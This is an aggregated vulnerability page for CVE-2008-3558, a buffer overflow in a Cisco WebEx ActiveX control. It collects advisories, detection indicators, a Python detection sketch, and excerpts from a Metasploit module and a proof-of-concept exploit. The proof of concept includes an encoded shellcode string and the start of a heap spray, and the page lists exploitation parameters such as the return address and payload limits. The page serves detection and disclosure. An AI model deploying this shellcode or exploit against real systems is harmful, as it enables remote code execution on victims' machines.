CVE-2008-3558
Published 2008-08-08
Priority: P2 61 · critical · 9.3 CVSS 2.0
CVSS vector: AV:N/AC:M/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 65.39% (99.2th percentile)
Stack-based buffer overflow in the WebexUCFObject ActiveX control in atucfobj.dll in Cisco WebEx Meeting Manager before 20.2008.2606.4919 allows remote attackers to execute arbitrary code via a long argument to the NewObject method.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| cisco | webex_meeting_manager | — | — |
| cisco | webex_meeting_manager_activex_control | — | — |
Detection & IOCs (extracted from sources)
Bytes: %u0909%u0909 (heap spray NOP sled)
- Detect instantiation of the vulnerable ActiveX control by its CLSID (32E26FD9-F435-4A20-A561-35D4B987CFDC) or ProgID (WebexUCFObject.WebexUCFObject) in HTML/script content.
- Detect the heap-spray pattern using the 0x0909 NOP-equivalent sled (unescape('%u0909%u0909')) combined with shellcode targeting return address 0x0c0c0c0c.
- Flag presence of atucfobj.dll versions prior to 20.2008.2606.4919 on endpoints; the exploit was tested against v20.2008.2601.4928.
- The Metasploit module uses EXITFUNC=process and an auto-migrate post-exploitation step; monitor for unexpected process migration activity following iexplore.exe loading atucfobj.dll.
- The exploit payload space is limited to 1024 bytes with null bytes (%x00) as bad characters; payloads exceeding this or containing null bytes will fail.
- The exploit relies on a heap-spray technique to deliver the payload unmodified into memory due to input restrictions imposed by the sprintf copy path.
- The PoC was tested only against IE6 on Windows XP SP1; behaviour on other browser/OS combinations is not confirmed by the original exploit author.
- Cisco's remediation is delivered automatically when users connect to the WebEx meeting service; users unable to connect require a manual workaround.
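The first three detection points above can be combined into a first-pass triage check. The sketch below is an added example, not code from Cisco, Metasploit or the PoC author; the function names and the two sample pages are constructed for illustration, and only the CLSID, ProgID, sled bytes and fixed version come from this page.

```python
import re

# Indicators quoted on this page.
CLSID = "32E26FD9-F435-4A20-A561-35D4B987CFDC"
PROGID = "WebexUCFObject.WebexUCFObject"
FIXED_VERSION = (20, 2008, 2606, 4919)

PATTERNS = {
    "clsid": re.compile(re.escape(CLSID), re.I),
    "progid": re.compile(re.escape(PROGID), re.I),
    # Two or more 0x0909 units, written either as %u0909 or as \u0909.
    "sled_0909": re.compile(r"(?:(?:%|\\)u0909){2,}", re.I),
}

def scan_content(text):
    """Return the sorted names of indicators found in HTML/script text."""
    return sorted(name for name, rx in PATTERNS.items() if rx.search(text))

def verdict(hits):
    """Control use alone is 'review' (WebEx pages do this legitimately);
    control use together with the sled is 'alert'."""
    control = {"clsid", "progid"} & set(hits)
    if control and "sled_0909" in hits:
        return "alert"
    return "review" if control else "clean"

def is_vulnerable_build(version):
    """True when an atucfobj.dll file version is below the fixed build.
    Accepts '20.2008.2601.4928' or the comma form '20, 2008, 2601, 4928'."""
    parts = tuple(int(p) for p in re.split(r"[.,]\s*", version.strip()))
    if len(parts) != 4:
        raise ValueError(f"expected a four-part file version: {version!r}")
    return parts < FIXED_VERSION  # numeric, field-by-field comparison

# Constructed sample inputs (no payload, indicators only).
BENIGN = '<script>var o = new ActiveXObject("WebexUCFObject.WebexUCFObject");</script>'
SUSPICIOUS = (
    '<object classid="clsid:32e26fd9-f435-4a20-a561-35d4b987cfdc" id="t"></object>'
    '<script>var block = unescape("%u0909%u0909");</script>'
)

if __name__ == "__main__":
    for label, page in (("benign", BENIGN), ("suspicious", SUSPICIOUS)):
        hits = scan_content(page)
        print(label, hits, verdict(hits))
    print("20.2008.2601.4928 vulnerable:", is_vulnerable_build("20.2008.2601.4928"))
```

Static matching of this kind misses script that builds the identifiers or the sled at run time, so it serves as a filter ahead of endpoint version checks rather than a replacement for them.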
Cisco
Vulnerability in Cisco WebEx Meeting Manager ActiveX Control
vendor_cisco·2008-08-14
CVE-2008-3558 [CRITICAL] CWE-119 Vulnerability in Cisco WebEx Meeting Manager ActiveX Control
A buffer overflow vulnerability exists in an ActiveX control used by
the WebEx Meeting Manager. Exploitation of this vulnerability could allow a
remote attacker to execute arbitrary code on the user client machine. The WebEx
Meeting Manager is a client-side program that is provided by the Cisco WebEx
meeting service. The Cisco WebEx meeting service automatically downloads,
installs, and configures Meeting Manager the first time a user begins or joins
a meeting.
When users connect to the WebEx meeting service, the WebEx Meeting
Manager is automatically upgraded to the latest version. There is a manual
workaround available for users who are not able to connect to the WebEx meeting
service.
Cisco WebEx is in the process of upgrad
GHSA
GHSA-g6x7-m6fm-69fg: Stack-based buffer overflow in the WebexUCFObject ActiveX control in atucfobj
ghsa_unreviewed·2022-05-02
CVE-2008-3558 [HIGH] CWE-119 GHSA-g6x7-m6fm-69fg: Stack-based buffer overflow in the WebexUCFObject ActiveX control in atucfobj
Stack-based buffer overflow in the WebexUCFObject ActiveX control in atucfobj.dll in Cisco WebEx Meeting Manager before 20.2008.2606.4919 allows remote attackers to execute arbitrary code via a long argument to the NewObject method.
No detection rules found.
Exploit-DB
Cisco WebEx Meeting Manager UCF - 'atucfobj.dll' ActiveX NewObject Method Buffer Overflow (Metasploit)
exploitdb·2010-09-20
CVE-2008-3558 Cisco WebEx Meeting Manager UCF - 'atucfobj.dll' ActiveX NewObject Method Buffer Overflow (Metasploit)
---
##
# $Id: webex_ucf_newobject.rb 10394 2010-09-20 08:06:27Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'WebEx UCF atucfobj.dll ActiveX NewObject Method Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow in WebEx's WebexUCFObject
ActiveX Control. If an long string is passed to the 'NewObject' method, a stack-
based buffer overflow will occur when copying attacker-supplied data using the
Exploit-DB
Cisco WebEx Meeting Manager UCF - 'atucfobj.dll' ActiveX Remote Buffer Overflow
exploitdb·2008-08-10
CVE-2008-3558 Cisco WebEx Meeting Manager UCF - 'atucfobj.dll' ActiveX Remote Buffer Overflow
---
// k`sOSe 08/08/2008
// tested in IE6, XP SP1
var shellcode = unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%u315f%u60f6%u6456%u468b%u8b30%u0c40%u708b%uad1c%u688b%u8908%u83f8%u6ac0%u6850%u8af0%u5f04%u9868%u8afe%u570e%ue7ff%u3a43%u575c%u4e49%u4f44%u5357%u535c%u5359%u4554%u334d%u5c32%u4143%u434c%u452e%u4558%u4100");
var block = unescape("%u0909%u0909");
while (block.length
# milw0rm.com [2008-08-10]
Metasploit
WebEx UCF atucfobj.dll ActiveX NewObject Method Buffer Overflow
metasploit
This module exploits a stack-based buffer overflow in WebEx's WebexUCFObject ActiveX Control. If a long string is passed to the 'NewObject' method, a stack-based buffer overflow will occur when copying attacker-supplied data using the sprintf function. It is noteworthy that this vulnerability was discovered and reported by multiple independent researchers. To quote iDefense's advisory, "Before this issue was publicly reported, at least three independent security researchers had knowledge of this issue; thus, it is reasonable to believe that even more people were aware of this issue before disclosure." NOTE: Due to input restrictions, this exploit uses a heap-spray to get the payload into memory unmodified.
No writeups or analysis indexed.
- http://lists.grok.org.uk/pipermail/full-disclosure/2008-August/063692.html
- http://secunia.com/advisories/31397
- http://www.cisco.com/en/US/products/products_security_advisory09186a00809e2006.shtml
- http://www.kb.cert.org/vuls/id/661827
- http://www.securityfocus.com/bid/30578
- http://www.securitytracker.com/id?1020641
- http://www.vupen.com/english/advisories/2008/2319
- https://exchange.xforce.ibmcloud.com/vulnerabilities/44250
- https://www.exploit-db.com/exploits/6220